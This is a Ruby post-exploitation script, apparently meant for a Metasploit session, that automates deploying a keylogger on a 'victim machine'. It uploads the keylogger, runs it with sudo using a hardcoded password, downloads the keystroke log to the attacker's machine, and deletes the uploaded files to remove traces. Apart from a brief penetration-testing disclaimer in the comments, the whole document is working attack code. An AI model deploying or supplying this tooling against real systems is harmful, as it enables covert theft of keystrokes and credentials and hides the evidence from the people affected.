# This script automates the process of deploying and executing a keylogger on a victim machine,
# downloading the generated log file, and cleaning up the uploaded files. It is intended for
# penetration testing purposes and assumes the attacker has appropriate permissions and access.

# Variables:
# - local_keylogger_script: Path to the keylogger script on the attacker's machine.
# - remote_keylogger_script: Path where the keylogger script will be uploaded on the victim machine.
# - log_file_path: Path to the log file generated by the keylogger on the victim machine.
# - download_path: Path where the log file will be downloaded on the attacker's machine.
# - sudo_password: Sudo password for the victim machine (used to execute commands with elevated privileges).

# Steps:
# 1. Upload the keylogger script to the victim machine.
#    - Verifies the existence of the script on the attacker's machine before uploading.
#    - Uses the `upload_file` method to transfer the script to the victim machine.

# 2. Set execute permissions for the uploaded script.
#    - Executes a `chmod +x` command on the victim machine to make the script executable.

# 3. Execute the keylogger script on the victim machine with sudo privileges.
#    - Constructs a command to run the script using the provided sudo password.
#    - Executes the command and checks for successful execution.

# 4. Check for the existence of the log file generated by the keylogger.
#    - Verifies if the log file exists on the victim machine.
#    - Downloads the log file to the attacker's machine if it exists.

# 5. Clean up uploaded files.
#    - Removes the uploaded keylogger script and log file from the victim machine.
#    - Uses sudo privileges to ensure proper cleanup.

# Notes:
# - Ensure the keylogger script is properly configured and tested before deployment.
# - This script is for ethical hacking and penetration testing purposes only.
# - Unauthorized use of this script may violate laws and ethical guidelines.

# Define paths for the keylogger script and log file
local_keylogger_script = "/home/kali/Documents/keylogger.sh" # Local path on attacker machine
remote_keylogger_script = "/tmp/keylogger.sh"               # Remote path on victim machine
log_file_path = "/tmp/keyboard_log.txt"                     # Log file on victim machine
download_path = "/home/kali/Documents/keyboard_log.txt"     # Local path to save downloaded log file
sudo_password = "kali"                                      # Sudo password for victim machine

# Step 1: Upload the keylogger script to the victim machine
print_status("Uploading keylogger script to the victim machine...")
if File.exist?(local_keylogger_script)
  session.fs.file.upload_file(remote_keylogger_script, local_keylogger_script)
  print_good("Keylogger script uploaded successfully.")
else
  print_error("Keylogger script does not exist on the attacker machine.")
  return
end

# Step 2: Set the uploaded script as executable
print_status("Setting execute permissions for the uploaded script...")
cmd_exec("chmod +x #{remote_keylogger_script}")

# Step 3: Execute the keylogger script on the victim machine with sudo
print_status("Executing the keylogger script on the victim machine...")
remote_command = "echo '#{sudo_password}' | sudo -S bash #{remote_keylogger_script}"
output = cmd_exec(remote_command)

if output.nil? || output.empty?
  print_error("Failed to execute the script with sudo. Check permissions or script content.")
  return
else
  print_good("Keylogger script executed successfully with sudo.")
  print_line("Output: #{output}")
end

# Step 4: Check for and download the log file
print_status("Checking for the key log file on the victim machine...")
if session.fs.file.exist?(log_file_path)
  print_status("Downloading the key log file...")
  session.fs.file.download_file(download_path, log_file_path)
  print_good("Key log file downloaded successfully to #{download_path}.")
else
  print_error("Log file not found on the victim machine. Check the script execution.")
  return
end

# Step 5: Clean up by removing the uploaded script and log file
print_status("Cleaning up uploaded files...")
cmd_exec("echo '#{sudo_password}' | sudo -S rm -f #{remote_keylogger_script} #{log_file_path}")
print_good("Uploaded script and log file cleaned up successfully.")